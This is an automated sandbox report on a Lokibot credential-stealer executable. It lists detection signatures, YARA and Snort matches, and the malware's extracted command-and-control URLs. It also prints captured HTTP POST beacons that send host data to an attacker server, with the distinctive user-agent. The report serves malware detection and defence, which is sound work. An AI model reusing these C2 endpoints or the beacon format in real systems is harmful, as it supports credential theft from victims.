Windows Analysis Report __.exe

Overview

General Information

Sample Name: __.exe
Analysis ID: 553072
MD5: e9b74bfb67bf3dcef39e23674d4dd63f
SHA1: 6fc16b7fe6e2d6567bfd2cf68b407fc7f5097a93
SHA256: aeff0c4823c37fc2054f80c6bf7dafcf7fce8abb84d7b72a08fa67411d2aa480
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • __.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\__.exe" MD5: E9B74BFB67BF3DCEF39E23674D4DD63F)
    • __.exe (PID: 5768 cmdline: "C:\Users\user\Desktop\__.exe" MD5: E9B74BFB67BF3DCEF39E23674D4DD63F)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000002.553223743.00000000007A7000.00000004.00000020.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security
00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp | Loki_1 | Loki Payload | kevoreilly
  • Strings: 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • Strings: 0x153fc:$a2: last_compatible_version
(38 entries in total; only the first are shown here)

Unpacked PEs

Source | Rule | Description | Author
3.0.__.exe.400000.6.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
3.0.__.exe.400000.6.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
3.0.__.exe.400000.6.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
3.0.__.exe.400000.6.raw.unpack | Loki_1 | Loki Payload | kevoreilly
  • Strings: 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • Strings: 0x153fc:$a2: last_compatible_version
3.0.__.exe.400000.6.raw.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • Strings: 0x13bff:$des3: 68 03 66 00 00
  • Strings: 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • Strings: 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
(82 entries in total; only the first are shown here)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Multi AV Scanner detection for submitted file
Source: __.exe | Virustotal: Detection: 34%
Source: __.exe | ReversingLabs: Detection: 39%
Antivirus detection for URL or domain
Source: http://slimpackage.com/slimmain/five/fre.php3 | Avira URL Cloud: Label: malware
Source: http://slimpackage.com/slimmain/five/fre.php | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: slimpackage.com | Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsjD69.tmp\firfslz.dll | Virustotal: Detection: 13%
Machine Learning detection for sample
Source: __.exe | Joe Sandbox ML: detected
Source: 3.0.__.exe.400000.0.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: __.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP | source: __.exe, 00000002.00000003.291276471.00000000030A0000.00000004.00000001.sdmp, __.exe, 00000002.00000003.292633393.0000000003230000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb | source: __.exe, 00000002.00000003.291276471.00000000030A0000.00000004.00000001.sdmp, __.exe, 00000002.00000003.292633393.0000000003230000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\__.exe | Code function: 2_2_00405D7C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\__.exe | Code function: 2_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\__.exe | Code function: 2_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\__.exe | Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS. Every alert is for 192.168.2.3 -> 104.223.93.105:80; three rules fire on each of the 56 connections, listed here by client source port:
  • 49743, 49744: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1; 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno); 2025381 ET TROJAN LokiBot Checkin
  • 49745-49755, 49758-49767, 49769-49772, 49781, 49791, 49809-49811, 49817-49819, 49821, 49822, 49830, 49837, 49844, 49848, 49849, 49851-49864: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1; 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno); 2025381 ET TROJAN LokiBot Checkin
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
                Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
                Source: global traffic; HTTP traffic detected:
                POST /slimmain/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: slimpackage.com
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: CC3B1AE
                Content-Length: 163
                Connection: close
                Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Fri, 14 Jan 2022 08:24:20 GMT
                Server: Apache
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.
                Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Fri, 14 Jan 2022 08:24:22 GMT
                Server: Apache
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.
                Source: __.exe; String found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: __.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: __.exe, 00000003.00000003.422484605.00000000007BC000.00000004.00000001.sdmp, __.exe, 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmp, __.exe, 00000003.00000002.553140471.00000000004A0000.00000040.00000001.sdmp; String found in binary or memory: http://slimpackage.com/slimmain/five/fre.php
                Source: __.exe, 00000003.00000003.422484605.00000000007BC000.00000004.00000001.sdmp, __.exe, 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmp; String found in binary or memory: http://slimpackage.com/slimmain/five/fre.php3
                Source: __.exe, __.exe, 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, __.exe, 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp; String found in binary or memory: http://www.ibsensoftware.com/
                Source: unknown; HTTP traffic detected:
                POST /slimmain/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: slimpackage.com
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: CC3B1AE
                Content-Length: 190
                Connection: close
                Source: unknown; DNS traffic detected: queries for: slimpackage.com
                Source: C:\Users\user\Desktop\__.exe; Code function: 3_2_00404ED4 recv,
                Source: C:\Users\user\Desktop\__.exe; Code function: 2_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

                System Summary:

                Malicious sample detected (through community Yara rule)
                Source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
                Source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Loki Payload, Author: kevoreilly
                Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Loki Payload, Author: kevoreilly
                Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Loki Payload, Author: kevoreilly
                Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Loki Payload, Author: kevoreilly
                Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Loki Payload, Author: kevoreilly
                Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Loki Payload, Author: kevoreilly
                Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Loki Payload, Author: kevoreilly
                Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
                Source: __.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
